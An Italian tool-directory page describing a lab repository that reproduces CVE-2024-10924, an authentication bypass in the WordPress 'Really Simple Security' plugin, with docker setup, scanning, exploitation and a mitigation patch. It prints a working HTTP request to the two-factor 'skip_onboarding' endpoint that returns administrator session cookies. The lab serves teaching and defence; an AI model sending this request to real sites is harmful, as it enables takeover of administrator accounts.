Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-10924 — Laboratorio passo-passo che dimostra il bypass dell'autenticazione CVE-2024-10924 nel plugin Really Simple Security, con exploit Python automatizzato, sfruttamento manuale con Burp Suite, scansione GVM e patch di mitigazione. | Kitploit
Strumenti/GitHubGitHub/bodoinon/cve-2024-10924
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingAutenticazioneApprendimento e Formazione
GitHubbodoinon/cve-2024-10924

CVE-2024-10924

Laboratorio passo-passo che dimostra il bypass dell'autenticazione CVE-2024-10924 nel plugin Really Simple Security, con exploit Python automatizzato, sfruttamento manuale con Burp Suite, scansione GVM e patch di mitigazione.

Vedi Repository
7 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-10924 - Bypass dell'autenticazione in Really Simple Security

PANORAMICA Questo progetto dimostra lo sfruttamento e la mitigazione di CVE-2024-10924, una vulnerabilità critica di bypass dell'autenticazione nel plugin WordPress "Really Simple Security".

STEP 1: CONFIGURAZIONE DELL'AMBIENTE

Avvia l'ambiente WordPress vulnerabile: cd wordpress-really-simple-security-authn-bypass-vulnerable-application docker-compose up -d

Verificare che i contenitori siano in esecuzione: docker ps

Accedi a WordPress: http://localhost:1337

Strumenti richiesti:

  • Python 3.x (per exploit automatizzato)
  • Burp Suite (per sfruttamento manuale)
  • GVM (Greenbone Vulnerability Management) per la scansione

STEP 2: SCANSIONE DELLA VULNERABILITÀ

Esegui la scansione GVM contro il target:

  • Target: http://localhost:1337
  • Risultato atteso: CVE-2024-10924 rilevato
  • Gravità: Critica (CVSS 9.8)
  • Endpoint vulnerabile: /reallysimplessl/v1/two_fa/skip_onboarding

STEP 3: SFRUTTAMENTO

Metodo A - Exploit Python automatizzato: python exploit.py

Metodo B - Burp Suite manuale:

  1. Intercetta il traffico verso http://localhost:1337

  2. Invia richiesta POST: POST /?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1 Host: localhost:1337 Content-Type: application/json

    {"user_id": 1, "login_nonce": "hack", "redirect_to": "/wp-admin/"}

  3. Osserva la risposta con l'intestazione Set-Cookie contenente la sessione amministratore

Risultato atteso:

  • Status: 200 OK
  • Cookie di sessione amministratore restituiti
  • Bypass riuscito senza credenziali

STEP 4: MITIGAZIONE

Applica la patch per bloccare l'endpoint vulnerabile: .\patch.ps1

Cosa fa:

  • Copia mitigation.php nel contenitore in /wp-content/mu-plugins/
  • Blocca tutte le richieste all'endpoint REST API vulnerabile
  • Restituisce 403 Forbidden per i tentativi di exploit

STEP 5: VERIFICA

Esegui nuovamente l'exploit (Metodo A o B): python exploit.py

Risultato atteso dopo la mitigazione:

  • Status: 403 Forbidden
  • Nessun cookie di sessione amministratore restituito
  • Attacco bloccato con successo

NOTE AGGIUNTIVE

Per fermare l'ambiente: docker-compose down

Per visualizzare i log dei contenitori: docker-compose logs -f

Per accedere legittimamente all'amministrazione di WordPress: http://localhost:1337/wp-admin (Controlla docker-compose.yml per le credenziali)

Scarica lo strumento